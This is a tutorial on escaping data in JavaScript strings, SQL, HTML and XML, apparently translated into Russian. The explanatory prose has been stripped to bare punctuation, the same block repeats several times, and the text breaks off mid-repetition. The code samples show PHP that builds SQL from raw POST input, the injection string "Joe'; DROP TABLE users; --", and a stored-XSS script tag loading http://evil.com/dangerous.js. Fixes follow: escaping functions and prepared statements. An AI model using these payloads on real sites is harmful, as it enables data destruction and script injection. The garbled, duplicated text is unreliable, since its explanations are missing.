var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
